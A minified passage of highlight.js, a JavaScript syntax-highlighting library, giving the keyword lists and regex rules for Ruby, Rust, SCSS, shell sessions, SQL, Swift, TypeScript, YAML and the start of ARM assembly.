return redo if BEGIN retry end for self when next until do begin unless END rescue else break undef not super class case require yield alias while ensure elsif or include attr_reader attr_writer attr_accessor",literal:"true false nil"},s={className:"doctag",begin:"@[A-Za-z]+"},i={begin:"#<",end:">"},r=[e.COMMENT("#","$",{contains:[s]}),e.COMMENT("^\\=begin","^\\=end",{contains:[s],relevance:10}),e.COMMENT("^__END__","\\n$")],c={className:"subst",begin:"#\\{",end:"}",keywords:a},t={className:"string",contains:[e.BACKSLASH_ESCAPE,c],variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/`/,end:/`/},{begin:"%[qQwWx]?\\(",end:"\\)"},{begin:"%[qQwWx]?\\[",end:"\\]"},{begin:"%[qQwWx]?{",end:"}"},{begin:"%[qQwWx]?<",end:">"},{begin:"%[qQwWx]?/",end:"/"},{begin:"%[qQwWx]?%",end:"%"},{begin:"%[qQwWx]?-",end:"-"},{begin:"%[qQwWx]?\\|",end:"\\|"},{begin:/\B\?(\\\d{1,3}|\\x[A-Fa-f0-9]{1,2}|\\u[A-Fa-f0-9]{4}|\\?\S)\b/},{begin:/<<[-~]?'?(\w+)(?:.|\n)*?\n\s*\1\b/,returnBegin:!0,contains:[{begin:/<<[-~]?'?/},e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,contains:[e.BACKSLASH_ESCAPE,c]})]}]},b={className:"params",begin:"\\(",end:"\\)",endsParent:!0,keywords:a},d=[t,i,{className:"class",beginKeywords:"class 
module",end:"$|;",illegal:/=/,contains:[e.inherit(e.TITLE_MODE,{begin:"[A-Za-z_]\\w*(::\\w+)*(\\?|\\!)?"}),{begin:"<\\s*",contains:[{begin:"("+e.IDENT_RE+"::)?"+e.IDENT_RE}]}].concat(r)},{className:"function",beginKeywords:"def",end:"$|;",contains:[e.inherit(e.TITLE_MODE,{begin:n}),b].concat(r)},{begin:e.IDENT_RE+"::"},{className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"(\\!|\\?)?:",relevance:0},{className:"symbol",begin:":(?!\\s)",contains:[t,{begin:n}],relevance:0},{className:"number",begin:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",relevance:0},{begin:"(\\$\\W)|((\\$|\\@\\@?)(\\w+))"},{className:"params",begin:/\|/,end:/\|/,keywords:a},{begin:"("+e.RE_STARTERS_RE+"|unless)\\s*",keywords:"unless",contains:[i,{className:"regexp",contains:[e.BACKSLASH_ESCAPE,c],illegal:/\n/,variants:[{begin:"/",end:"/[a-z]*"},{begin:"%r{",end:"}[a-z]*"},{begin:"%r\\(",end:"\\)[a-z]*"},{begin:"%r!",end:"![a-z]*"},{begin:"%r\\[",end:"\\][a-z]*"}]}].concat(r),relevance:0}].concat(r);c.contains=d,b.contains=d;var g=[{begin:/^\s*=>/,starts:{end:"$",contains:d}},{className:"meta",begin:"^([>?]>|[\\w#]+\\(\\w+\\):\\d+:\\d+>|(\\w+-)?\\d+\\.\\d+\\.\\d(p\\d+)?[^>]+>)",starts:{end:"$",contains:d}}];return{name:"Ruby",aliases:["rb","gemspec","podspec","thor","irb"],keywords:a,illegal:/\/\*/,contains:r.concat(g).concat(d)}}}()); +hljs.registerLanguage("rust",function(){"use strict";return function(e){var n="([ui](8|16|32|64|128|size)|f(32|64))?",t="drop i8 i16 i32 i64 i128 isize u8 u16 u32 u64 u128 usize f32 f64 str char bool Box Option Result String Vec Copy Send Sized Sync Drop Fn FnMut FnOnce ToOwned Clone Debug PartialEq PartialOrd Eq Ord AsRef AsMut Into From Default Iterator Extend IntoIterator DoubleEndedIterator ExactSizeIterator SliceConcatExt ToString assert! assert_eq! bitflags! bytes! cfg! col! concat! concat_idents! debug_assert! debug_assert_eq! env! panic! file! format! format_args! include_bin! include_str! line! local_data_key! module_path! 
option_env! print! println! select! stringify! try! unimplemented! unreachable! vec! write! writeln! macro_rules! assert_ne! debug_assert_ne!";return{name:"Rust",aliases:["rs"],keywords:{$pattern:e.IDENT_RE+"!?",keyword:"abstract as async await become box break const continue crate do dyn else enum extern false final fn for if impl in let loop macro match mod move mut override priv pub ref return self Self static struct super trait true try type typeof unsafe unsized use virtual where while yield",literal:"true false Some None Ok Err",built_in:t},illegal:""}]}}}()); +hljs.registerLanguage("scss",function(){"use strict";return function(e){var t={className:"variable",begin:"(\\$[a-zA-Z-][a-zA-Z0-9_-]*)\\b"},i={className:"number",begin:"#[0-9A-Fa-f]+"};return e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,e.C_BLOCK_COMMENT_MODE,{name:"SCSS",case_insensitive:!0,illegal:"[=/|']",contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"selector-id",begin:"\\#[A-Za-z0-9_-]+",relevance:0},{className:"selector-class",begin:"\\.[A-Za-z0-9_-]+",relevance:0},{className:"selector-attr",begin:"\\[",end:"\\]",illegal:"$"},{className:"selector-tag",begin:"\\b(a|abbr|acronym|address|area|article|aside|audio|b|base|big|blockquote|body|br|button|canvas|caption|cite|code|col|colgroup|command|datalist|dd|del|details|dfn|div|dl|dt|em|embed|fieldset|figcaption|figure|footer|form|frame|frameset|(h[1-6])|head|header|hgroup|hr|html|i|iframe|img|input|ins|kbd|keygen|label|legend|li|link|map|mark|meta|meter|nav|noframes|noscript|object|ol|optgroup|option|output|p|param|pre|progress|q|rp|rt|ruby|samp|script|section|select|small|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|time|title|tr|tt|ul|var|video)\\b",relevance:0},{className:"selector-pseudo",begin:":(visited|valid|root|right|required|read-write|read-only|out-range|optional|only-of-type|only-child|nth-of-type|nth-last-of-type|nth-last-child|nth-child|not|link|left|last-of-type|last-child|lang|
invalid|indeterminate|in-range|hover|focus|first-of-type|first-line|first-letter|first-child|first|enabled|empty|disabled|default|checked|before|after|active)"},{className:"selector-pseudo",begin:"::(after|before|choices|first-letter|first-line|repeat-index|repeat-item|selection|value)"},t,{className:"attribute",begin:"\\b(src|z-index|word-wrap|word-spacing|word-break|width|widows|white-space|visibility|vertical-align|unicode-bidi|transition-timing-function|transition-property|transition-duration|transition-delay|transition|transform-style|transform-origin|transform|top|text-underline-position|text-transform|text-shadow|text-rendering|text-overflow|text-indent|text-decoration-style|text-decoration-line|text-decoration-color|text-decoration|text-align-last|text-align|tab-size|table-layout|right|resize|quotes|position|pointer-events|perspective-origin|perspective|page-break-inside|page-break-before|page-break-after|padding-top|padding-right|padding-left|padding-bottom|padding|overflow-y|overflow-x|overflow-wrap|overflow|outline-width|outline-style|outline-offset|outline-color|outline|orphans|order|opacity|object-position|object-fit|normal|none|nav-up|nav-right|nav-left|nav-index|nav-down|min-width|min-height|max-width|max-height|mask|marks|margin-top|margin-right|margin-left|margin-bottom|margin|list-style-type|list-style-position|list-style-image|list-style|line-height|letter-spacing|left|justify-content|initial|inherit|ime-mode|image-orientation|image-resolution|image-rendering|icon|hyphens|height|font-weight|font-variant-ligatures|font-variant|font-style|font-stretch|font-size-adjust|font-size|font-language-override|font-kerning|font-feature-settings|font-family|font|float|flex-wrap|flex-shrink|flex-grow|flex-flow|flex-direction|flex-basis|flex|filter|empty-cells|display|direction|cursor|counter-reset|counter-increment|content|column-width|column-span|column-rule-width|column-rule-style|column-rule-color|column-rule|column-gap|column-fill|column-count|columns|color
|clip-path|clip|clear|caption-side|break-inside|break-before|break-after|box-sizing|box-shadow|box-decoration-break|bottom|border-width|border-top-width|border-top-style|border-top-right-radius|border-top-left-radius|border-top-color|border-top|border-style|border-spacing|border-right-width|border-right-style|border-right-color|border-right|border-radius|border-left-width|border-left-style|border-left-color|border-left|border-image-width|border-image-source|border-image-slice|border-image-repeat|border-image-outset|border-image|border-color|border-collapse|border-bottom-width|border-bottom-style|border-bottom-right-radius|border-bottom-left-radius|border-bottom-color|border-bottom|border|background-size|background-repeat|background-position|background-origin|background-image|background-color|background-clip|background-attachment|background-blend-mode|background|backface-visibility|auto|animation-timing-function|animation-play-state|animation-name|animation-iteration-count|animation-fill-mode|animation-duration|animation-direction|animation-delay|animation|align-self|align-items|align-content)\\b",illegal:"[^\\s]"},{begin:"\\b(whitespace|wait|w-resize|visible|vertical-text|vertical-ideographic|uppercase|upper-roman|upper-alpha|underline|transparent|top|thin|thick|text|text-top|text-bottom|tb-rl|table-header-group|table-footer-group|sw-resize|super|strict|static|square|solid|small-caps|separate|se-resize|scroll|s-resize|rtl|row-resize|ridge|right|repeat|repeat-y|repeat-x|relative|progress|pointer|overline|outside|outset|oblique|nowrap|not-allowed|normal|none|nw-resize|no-repeat|no-drop|newspaper|ne-resize|n-resize|move|middle|medium|ltr|lr-tb|lowercase|lower-roman|lower-alpha|loose|list-item|line|line-through|line-edge|lighter|left|keep-all|justify|italic|inter-word|inter-ideograph|inside|inset|inline|inline-block|inherit|inactive|ideograph-space|ideograph-parenthesis|ideograph-numeric|ideograph-alpha|horizontal|hidden|help|hand|groove|fixed|ellipsis|e-resize|double|d
otted|distribute|distribute-space|distribute-letter|distribute-all-lines|disc|disabled|default|decimal|dashed|crosshair|collapse|col-resize|circle|char|center|capitalize|break-word|break-all|bottom|both|bolder|bold|block|bidi-override|below|baseline|auto|always|all-scroll|absolute|table|table-cell)\\b"},{begin:":",end:";",contains:[t,i,e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,{className:"meta",begin:"!important"}]},{begin:"@(page|font-face)",lexemes:"@[a-z-]+",keywords:"@page @font-face"},{begin:"@",end:"[{;]",returnBegin:!0,keywords:"and or not only",contains:[{begin:"@[a-z-]+",className:"keyword"},t,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,i,e.CSS_NUMBER_MODE]}]}}}()); +hljs.registerLanguage("shell",function(){"use strict";return function(s){return{name:"Shell Session",aliases:["console"],contains:[{className:"meta",begin:"^\\s{0,3}[/\\w\\d\\[\\]()@-]*[>%$#]",starts:{end:"$",subLanguage:"bash"}}]}}}()); +hljs.registerLanguage("sql",function(){"use strict";return function(e){var t=e.COMMENT("--","$");return{name:"SQL",case_insensitive:!0,illegal:/[<>{}*]/,contains:[{beginKeywords:"begin end start commit rollback savepoint lock alter create drop rename call delete do handler insert load replace select truncate update set show pragma grant merge describe use explain help declare prepare execute deallocate release unlock purge reset change stop analyze cache flush optimize repair kill install uninstall checksum restore check backup revoke comment values with",end:/;/,endsWithParent:!0,keywords:{$pattern:/[\w\.]+/,keyword:"as abort abs absolute acc acce accep accept access accessed accessible account acos action activate add addtime admin administer advanced advise aes_decrypt aes_encrypt after agent aggregate ali alia alias all allocate allow alter always analyze ancillary and anti any anydata anydataset anyschema anytype apply archive archived archivelog are as asc ascii asin assembly assertion associate asynchronous at atan atn2 attr attri attrib 
attribu attribut attribute attributes audit authenticated authentication authid authors auto autoallocate autodblink autoextend automatic availability avg backup badfile basicfile before begin beginning benchmark between bfile bfile_base big bigfile bin binary_double binary_float binlog bit_and bit_count bit_length bit_or bit_xor bitmap blob_base block blocksize body both bound bucket buffer_cache buffer_pool build bulk by byte byteordermark bytes cache caching call calling cancel capacity cascade cascaded case cast catalog category ceil ceiling chain change changed char_base char_length character_length characters characterset charindex charset charsetform charsetid check checksum checksum_agg child choose chr chunk class cleanup clear client clob clob_base clone close cluster_id cluster_probability cluster_set clustering coalesce coercibility col collate collation collect colu colum column column_value columns columns_updated comment commit compact compatibility compiled complete composite_limit compound compress compute concat concat_ws concurrent confirm conn connec connect connect_by_iscycle connect_by_isleaf connect_by_root connect_time connection consider consistent constant constraint constraints constructor container content contents context contributors controlfile conv convert convert_tz corr corr_k corr_s corresponding corruption cos cost count count_big counted covar_pop covar_samp cpu_per_call cpu_per_session crc32 create creation critical cross cube cume_dist curdate current current_date current_time current_timestamp current_user cursor curtime customdatum cycle data database databases datafile datafiles datalength date_add date_cache date_format date_sub dateadd datediff datefromparts datename datepart datetime2fromparts day day_to_second dayname dayofmonth dayofweek dayofyear days db_role_change dbtimezone ddl deallocate declare decode decompose decrement decrypt deduplicate def defa defau defaul default defaults deferred defi defin define degrees 
delayed delegate delete delete_all delimited demand dense_rank depth dequeue des_decrypt des_encrypt des_key_file desc descr descri describ describe descriptor deterministic diagnostics difference dimension direct_load directory disable disable_all disallow disassociate discardfile disconnect diskgroup distinct distinctrow distribute distributed div do document domain dotnet double downgrade drop dumpfile duplicate duration each edition editionable editions element ellipsis else elsif elt empty enable enable_all enclosed encode encoding encrypt end end-exec endian enforced engine engines enqueue enterprise entityescaping eomonth error errors escaped evalname evaluate event eventdata events except exception exceptions exchange exclude excluding execu execut execute exempt exists exit exp expire explain explode export export_set extended extent external external_1 external_2 externally extract failed failed_login_attempts failover failure far fast feature_set feature_value fetch field fields file file_name_convert filesystem_like_logging final finish first first_value fixed flash_cache flashback floor flush following follows for forall force foreign form forma format found found_rows freelist freelists freepools fresh from from_base64 from_days ftp full function general generated get get_format get_lock getdate getutcdate global global_name globally go goto grant grants greatest group group_concat group_id grouping grouping_id groups gtid_subtract guarantee guard handler hash hashkeys having hea head headi headin heading heap help hex hierarchy high high_priority hosts hour hours http id ident_current ident_incr ident_seed identified identity idle_time if ifnull ignore iif ilike ilm immediate import in include including increment index indexes indexing indextype indicator indices inet6_aton inet6_ntoa inet_aton inet_ntoa infile initial initialized initially initrans inmemory inner innodb input insert install instance instantiable instr interface interleaved intersect 
into invalidate invisible is is_free_lock is_ipv4 is_ipv4_compat is_not is_not_null is_used_lock isdate isnull isolation iterate java join json json_exists keep keep_duplicates key keys kill language large last last_day last_insert_id last_value lateral lax lcase lead leading least leaves left len lenght length less level levels library like like2 like4 likec limit lines link list listagg little ln load load_file lob lobs local localtime localtimestamp locate locator lock locked log log10 log2 logfile logfiles logging logical logical_reads_per_call logoff logon logs long loop low low_priority lower lpad lrtrim ltrim main make_set makedate maketime managed management manual map mapping mask master master_pos_wait match matched materialized max maxextents maximize maxinstances maxlen maxlogfiles maxloghistory maxlogmembers maxsize maxtrans md5 measures median medium member memcompress memory merge microsecond mid migration min minextents minimum mining minus minute minutes minvalue missing mod mode model modification modify module monitoring month months mount move movement multiset mutex name name_const names nan national native natural nav nchar nclob nested never new newline next nextval no no_write_to_binlog noarchivelog noaudit nobadfile nocheck nocompress nocopy nocycle nodelay nodiscardfile noentityescaping noguarantee nokeep nologfile nomapping nomaxvalue nominimize nominvalue nomonitoring none noneditionable nonschema noorder nopr nopro noprom nopromp noprompt norely noresetlogs noreverse normal norowdependencies noschemacheck noswitch not nothing notice notnull notrim novalidate now nowait nth_value nullif nulls num numb numbe nvarchar nvarchar2 object ocicoll ocidate ocidatetime ociduration ociinterval ociloblocator ocinumber ociref ocirefcursor ocirowid ocistring ocitype oct octet_length of off offline offset oid oidindex old on online only opaque open operations operator optimal optimize option optionally or oracle oracle_date oradata ord ordaudio 
orddicom orddoc order ordimage ordinality ordvideo organization orlany orlvary out outer outfile outline output over overflow overriding package pad parallel parallel_enable parameters parent parse partial partition partitions pascal passing password password_grace_time password_lock_time password_reuse_max password_reuse_time password_verify_function patch path patindex pctincrease pctthreshold pctused pctversion percent percent_rank percentile_cont percentile_disc performance period period_add period_diff permanent physical pi pipe pipelined pivot pluggable plugin policy position post_transaction pow power pragma prebuilt precedes preceding precision prediction prediction_cost prediction_details prediction_probability prediction_set prepare present preserve prior priority private private_sga privileges procedural procedure procedure_analyze processlist profiles project prompt protection public publishingservername purge quarter query quick quiesce quota quotename radians raise rand range rank raw read reads readsize rebuild record records recover recovery recursive recycle redo reduced ref reference referenced references referencing refresh regexp_like register regr_avgx regr_avgy regr_count regr_intercept regr_r2 regr_slope regr_sxx regr_sxy reject rekey relational relative relaylog release release_lock relies_on relocate rely rem remainder rename repair repeat replace replicate replication required reset resetlogs resize resource respect restore restricted result result_cache resumable resume retention return returning returns reuse reverse revoke right rlike role roles rollback rolling rollup round row row_count rowdependencies rowid rownum rows rtrim rules safe salt sample save savepoint sb1 sb2 sb4 scan schema schemacheck scn scope scroll sdo_georaster sdo_topo_geometry search sec_to_time second seconds section securefile security seed segment select self semi sequence sequential serializable server servererror session session_user sessions_per_user set sets 
settings sha sha1 sha2 share shared shared_pool short show shrink shutdown si_averagecolor si_colorhistogram si_featurelist si_positionalcolor si_stillimage si_texture siblings sid sign sin size size_t sizes skip slave sleep smalldatetimefromparts smallfile snapshot some soname sort soundex source space sparse spfile split sql sql_big_result sql_buffer_result sql_cache sql_calc_found_rows sql_small_result sql_variant_property sqlcode sqldata sqlerror sqlname sqlstate sqrt square standalone standby start starting startup statement static statistics stats_binomial_test stats_crosstab stats_ks_test stats_mode stats_mw_test stats_one_way_anova stats_t_test_ stats_t_test_indep stats_t_test_one stats_t_test_paired stats_wsr_test status std stddev stddev_pop stddev_samp stdev stop storage store stored str str_to_date straight_join strcmp strict string struct stuff style subdate subpartition subpartitions substitutable substr substring subtime subtring_index subtype success sum suspend switch switchoffset switchover sync synchronous synonym sys sys_xmlagg sysasm sysaux sysdate sysdatetimeoffset sysdba sysoper system system_user sysutcdatetime table tables tablespace tablesample tan tdo template temporary terminated tertiary_weights test than then thread through tier ties time time_format time_zone timediff timefromparts timeout timestamp timestampadd timestampdiff timezone_abbr timezone_minute timezone_region to to_base64 to_date to_days to_seconds todatetimeoffset trace tracking transaction transactional translate translation treat trigger trigger_nestlevel triggers trim truncate try_cast try_convert try_parse type ub1 ub2 ub4 ucase unarchived unbounded uncompress under undo unhex unicode uniform uninstall union unique unix_timestamp unknown unlimited unlock unnest unpivot unrecoverable unsafe unsigned until untrusted unusable unused update updated upgrade upped upper upsert url urowid usable usage use use_stored_outlines user user_data user_resources users using utc_date 
utc_timestamp uuid uuid_short validate validate_password_strength validation valist value values var var_samp varcharc vari varia variab variabl variable variables variance varp varraw varrawc varray verify version versions view virtual visible void wait wallet warning warnings week weekday weekofyear wellformed when whene whenev wheneve whenever where while whitespace window with within without work wrapped xdb xml xmlagg xmlattributes xmlcast xmlcolattval xmlelement xmlexists xmlforest xmlindex xmlnamespaces xmlpi xmlquery xmlroot xmlschema xmlserialize xmltable xmltype xor year year_to_month years yearweek",literal:"true false null unknown",built_in:"array bigint binary bit blob bool boolean char character date dec decimal float int int8 integer interval number numeric real record serial serial8 smallint text time timestamp tinyint varchar varchar2 varying void"},contains:[{className:"string",begin:"'",end:"'",contains:[{begin:"''"}]},{className:"string",begin:'"',end:'"',contains:[{begin:'""'}]},{className:"string",begin:"`",end:"`"},e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE,t,e.HASH_COMMENT_MODE]},e.C_BLOCK_COMMENT_MODE,t,e.HASH_COMMENT_MODE]}}}()); +hljs.registerLanguage("swift",function(){"use strict";return function(e){var i={keyword:"#available #colorLiteral #column #else #elseif #endif #file #fileLiteral #function #if #imageLiteral #line #selector #sourceLocation _ __COLUMN__ __FILE__ __FUNCTION__ __LINE__ Any as as! as? associatedtype associativity break case catch class continue convenience default defer deinit didSet do dynamic dynamicType else enum extension fallthrough false fileprivate final for func get guard if import in indirect infix init inout internal is lazy left let mutating nil none nonmutating open operator optional override postfix precedence prefix private protocol Protocol public repeat required rethrows return right self Self set static struct subscript super switch throw throws true try try! try? 
Type typealias unowned var weak where while willSet",literal:"true false nil",built_in:"abs advance alignof alignofValue anyGenerator assert assertionFailure bridgeFromObjectiveC bridgeFromObjectiveCUnconditional bridgeToObjectiveC bridgeToObjectiveCUnconditional c compactMap contains count countElements countLeadingZeros debugPrint debugPrintln distance dropFirst dropLast dump encodeBitsAsWords enumerate equal fatalError filter find getBridgedObjectiveCType getVaList indices insertionSort isBridgedToObjectiveC isBridgedVerbatimToObjectiveC isUniquelyReferenced isUniquelyReferencedNonObjC join lazy lexicographicalCompare map max maxElement min minElement numericCast overlaps partition posix precondition preconditionFailure print println quickSort readLine reduce reflect reinterpretCast reverse roundUpToAlignment sizeof sizeofValue sort split startsWith stride strideof strideofValue swap toString transcode underestimateCount unsafeAddressOf unsafeBitCast unsafeDowncast unsafeUnwrap unsafeReflect withExtendedLifetime withObjectAtPlusZero withUnsafePointer withUnsafePointerToObject withUnsafeMutablePointer withUnsafeMutablePointers withUnsafePointer withUnsafePointers withVaList zip"},n=e.COMMENT("/\\*","\\*/",{contains:["self"]}),t={className:"subst",begin:/\\\(/,end:"\\)",keywords:i,contains:[]},a={className:"string",contains:[e.BACKSLASH_ESCAPE,t],variants:[{begin:/"""/,end:/"""/},{begin:/"/,end:/"/}]},r={className:"number",begin:"\\b([\\d_]+(\\.[\\deE_]+)?|0x[a-fA-F0-9_]+(\\.[a-fA-F0-9p_]+)?|0b[01_]+|0o[0-7_]+)\\b",relevance:0};return 
t.contains=[r],{name:"Swift",keywords:i,contains:[a,e.C_LINE_COMMENT_MODE,n,{className:"type",begin:"\\b[A-Z][\\wÀ-ʸ']*[!?]"},{className:"type",begin:"\\b[A-Z][\\wÀ-ʸ']*",relevance:0},r,{className:"function",beginKeywords:"func",end:"{",excludeEnd:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/[A-Za-z$_][0-9A-Za-z$_]*/}),{begin://},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:i,contains:["self",r,a,e.C_BLOCK_COMMENT_MODE,{begin:":"}],illegal:/["']/}],illegal:/\[|%/},{className:"class",beginKeywords:"struct protocol class extension enum",keywords:i,end:"\\{",excludeEnd:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/[A-Za-z$_][\u00C0-\u02B80-9A-Za-z$_]*/})]},{className:"meta",begin:"(@discardableResult|@warn_unused_result|@exported|@lazy|@noescape|@NSCopying|@NSManaged|@objc|@objcMembers|@convention|@required|@noreturn|@IBAction|@IBDesignable|@IBInspectable|@IBOutlet|@infix|@prefix|@postfix|@autoclosure|@testable|@available|@nonobjc|@NSApplicationMain|@UIApplicationMain|@dynamicMemberLookup|@propertyWrapper)\\b"},{beginKeywords:"import",end:/$/,contains:[e.C_LINE_COMMENT_MODE,n]}]}}}()); +hljs.registerLanguage("typescript",function(){"use strict";const 
e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);return function(r){var t={$pattern:"[A-Za-z$_][0-9A-Za-z$_]*",keyword:e.concat(["type","namespace","typedef","interface","public","private","protected","implements","declare","abstract","readonly"]).join(" "),literal:n.join(" "),built_in:a.concat(["any","void","number","boolean","string","object","never","enum"]).join(" 
")},s={className:"meta",begin:"@[A-Za-z$_][0-9A-Za-z$_]*"},i={className:"number",variants:[{begin:"\\b(0[bB][01]+)n?"},{begin:"\\b(0[oO][0-7]+)n?"},{begin:r.C_NUMBER_RE+"n?"}],relevance:0},o={className:"subst",begin:"\\$\\{",end:"\\}",keywords:t,contains:[]},c={begin:"html`",end:"",starts:{end:"`",returnEnd:!1,contains:[r.BACKSLASH_ESCAPE,o],subLanguage:"xml"}},l={begin:"css`",end:"",starts:{end:"`",returnEnd:!1,contains:[r.BACKSLASH_ESCAPE,o],subLanguage:"css"}},E={className:"string",begin:"`",end:"`",contains:[r.BACKSLASH_ESCAPE,o]};o.contains=[r.APOS_STRING_MODE,r.QUOTE_STRING_MODE,c,l,E,i,r.REGEXP_MODE];var d={begin:"\\(",end:/\)/,keywords:t,contains:["self",r.QUOTE_STRING_MODE,r.APOS_STRING_MODE,r.NUMBER_MODE]},u={className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:t,contains:[r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,s,d]};return{name:"TypeScript",aliases:["ts"],keywords:t,contains:[r.SHEBANG(),{className:"meta",begin:/^\s*['"]use strict['"]/},r.APOS_STRING_MODE,r.QUOTE_STRING_MODE,c,l,E,r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,i,{begin:"("+r.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw 
case",contains:[r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,r.REGEXP_MODE,{className:"function",begin:"(\\([^(]*(\\([^(]*(\\([^(]*\\))?\\))?\\)|"+r.UNDERSCORE_IDENT_RE+")\\s*=>",returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:r.UNDERSCORE_IDENT_RE},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:t,contains:d.contains}]}]}],relevance:0},{className:"function",beginKeywords:"function",end:/[\{;]/,excludeEnd:!0,keywords:t,contains:["self",r.inherit(r.TITLE_MODE,{begin:"[A-Za-z$_][0-9A-Za-z$_]*"}),u],illegal:/%/,relevance:0},{beginKeywords:"constructor",end:/[\{;]/,excludeEnd:!0,contains:["self",u]},{begin:/module\./,keywords:{built_in:"module"},relevance:0},{beginKeywords:"module",end:/\{/,excludeEnd:!0},{beginKeywords:"interface",end:/\{/,excludeEnd:!0,keywords:"interface extends"},{begin:/\$[(.]/},{begin:"\\."+r.IDENT_RE,relevance:0},s,d]}}}()); +hljs.registerLanguage("yaml",function(){"use strict";return function(e){var n="true false yes no null",a="[\\w#;/?:@&=+$,.~*\\'()[\\]]+",s={className:"string",relevance:0,variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/\S+/}],contains:[e.BACKSLASH_ESCAPE,{className:"template-variable",variants:[{begin:"{{",end:"}}"},{begin:"%{",end:"}"}]}]},i=e.inherit(s,{variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/[^\s,{}[\]]+/}]}),l={end:",",endsWithParent:!0,excludeEnd:!0,contains:[],keywords:n,relevance:0},t={begin:"{",end:"}",contains:[l],illegal:"\\n",relevance:0},g={begin:"\\[",end:"\\]",contains:[l],illegal:"\\n",relevance:0},b=[{className:"attr",variants:[{begin:"\\w[\\w :\\/.-]*:(?=[ \t]|$)"},{begin:'"\\w[\\w :\\/.-]*":(?=[ \t]|$)'},{begin:"'\\w[\\w :\\/.-]*':(?=[ \t]|$)"}]},{className:"meta",begin:"^---s*$",relevance:10},{className:"string",begin:"[\\|>]([0-9]?[+-])?[ ]*\\n( *)[\\S ]+\\n(\\2[\\S 
]+\\n?)*"},{begin:"<%[%=-]?",end:"[%-]?%>",subLanguage:"ruby",excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:"!\\w+!"+a},{className:"type",begin:"!<"+a+">"},{className:"type",begin:"!"+a},{className:"type",begin:"!!"+a},{className:"meta",begin:"&"+e.UNDERSCORE_IDENT_RE+"$"},{className:"meta",begin:"\\*"+e.UNDERSCORE_IDENT_RE+"$"},{className:"bullet",begin:"\\-(?=[ ]|$)",relevance:0},e.HASH_COMMENT_MODE,{beginKeywords:n,keywords:{literal:n}},{className:"number",begin:"\\b[0-9]{4}(-[0-9][0-9]){0,2}([Tt \\t][0-9][0-9]?(:[0-9][0-9]){2})?(\\.[0-9]*)?([ \\t])*(Z|[-+][0-9][0-9]?(:[0-9][0-9])?)?\\b"},{className:"number",begin:e.C_NUMBER_RE+"\\b"},t,g,s],c=[...b];return c.pop(),c.push(i),l.contains=c,{name:"YAML",case_insensitive:!0,aliases:["yml","YAML"],contains:b}}}()); +hljs.registerLanguage("armasm",function(){"use strict";return function(s){const e={variants:[s.COMMENT("^[ \\t]*(?=#)","$",{relevance:0,excludeBegin:!0}),s.COMMENT("[;@]","$",{relevance:0}),s.C_LINE_COMMENT_MODE,s.C_BLOCK_COMMENT_MODE]};return{name:"ARM Assembly",case_insensitive:!0,aliases:["arm"],keywords:{$pattern:"\\.?"+s.IDENT_RE,meta:".2byte .4byte .align .ascii .asciz .balign .byte .code .data .else .end .endif .endm .endr .equ .err .exitm .extern .global .hword .if .ifdef .ifndef .include .irp .long .macro .rept .req .section .set .skip .space .text .word .arm .thumb .code16 .code32 .force_thumb .thumb_func .ltorg ALIAS ALIGN ARM AREA ASSERT ATTR CN CODE CODE16 CODE32 COMMON CP DATA DCB DCD DCDU DCDO DCFD DCFDU DCI DCQ DCQU DCW DCWU DN ELIF ELSE END ENDFUNC ENDIF ENDP ENTRY EQU EXPORT EXPORTAS EXTERN FIELD FILL FUNCTION GBLA GBLL GBLS GET GLOBAL IF IMPORT INCBIN INCLUDE INFO KEEP LCLA LCLL LCLS LTORG MACRO MAP MEND MEXIT NOFP OPT PRESERVE8 PROC QN READONLY RELOC REQUIRE REQUIRE8 RLIST FN ROUT SETA SETL SETS SN SPACE SUBT THUMB THUMBX TTL WHILE WEND ",built_in:"r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 pc lr sp ip sl sb fp a1 a2 a3 a4 v1 v2 v3 v4 v5 v6 v7 v8 f0 f1 
